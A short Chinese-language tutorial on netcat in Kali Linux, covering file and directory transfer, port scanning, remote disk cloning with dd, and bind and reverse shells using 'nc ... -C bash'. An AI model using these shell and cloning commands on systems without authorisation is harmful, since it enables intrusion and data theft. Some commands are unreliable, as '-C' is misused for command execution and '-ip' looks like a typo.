kali 工具NETCAT的使用方法

kali 工具NETCAT的使用方法，針對這個問題，這篇文章詳細介紹了相對應的分析和解答，希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

1.NETCAT作為客戶端常用的命令

nc -v verbose [use twice to be more verbose]

nc -n numeric-only IP addresses, no DNS

下列是nc的所有命令：  

nc -vn 123.125.50.29 110(POP3服務器的110端口)

nc -nv 202.181.12.12 25(SMTP服務器的25端口)

2.NC--傳輸文本信息

服務器：nc -l -p 端口號

客戶端：nc -nv 服務器的ip 端口號

應用：遠程電子取證

ls -l的取證

ps aux的取證

3.nc文件/目錄傳輸

（1）文件傳輸

往服務器傳文件：

服務器：nc -ip 端口號 > 文件名

客戶端：nc -nv 服務器ip地址 端口號 < 文件名 -q 1

往客戶端傳文件：

服務器：nc -lp 端口號 < 文件名 -q 1

客戶端：nc -nv 服務器ip地址 端口號 > 文件名

2）目錄傳輸

也涉及雙向，和上述的文件傳輸類似

向客戶端發送文件目錄：

服務器：tar -cvf - 目錄名/ | nc -lp 端口號 -q 1

客戶端：nc -nv 服務器ip地址 端口號 | tar -xvf -

（3）加密傳文件

服務器：nc -lp 端口號 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件名

客戶端：mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件名 | nc -nv ip地址 端口號-q 1

4.nc-流媒體服務

服務器：cat 文件名.mp4 | nc -lp 端口號

客戶端：nc -nv 服務器ip地址 端口號 | 播放器（mplayer） -vo x11 -cache 3000 -

5.nc--端口掃描

nc -nvz ip地址 端口范圍 //掃描TCP端口

nc -nvzu ip地址 端口范圍 //掃描UDP端口

每一個掃描器的掃描結果都不是特別準確的，可以多使用幾種方式對端口進行掃描以增加準確性

6.nc--遠程克隆硬盤

服務器：nc -lp 端口號 | dd of=/dev/sda

客戶端：dd if=/dev/sda | nc -nv 服務器ip地址 端口號 -q 1 

遠程電子取證，可以將目標服務器硬盤遠程復制，或者內存

7.nc--遠程控制

正向：服務器：nc -lp 端口 -C bash

           客戶端：nc -nv 服務器ip地址 端口

這樣可以使服務器獲得客戶端的一個bash

反向：服務器：nc -lp 端口

           客戶端：nc 服務器ip地址 端口 -C bash

這樣可以使客戶端獲得服務器的一個bash

nc缺乏加密和身份驗證的能力

關于kali 工具NETCAT的使用方法問題的解答就分享到這里了，希望以上內容可以對大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關注億速云行業資訊頻道了解更多相關知識。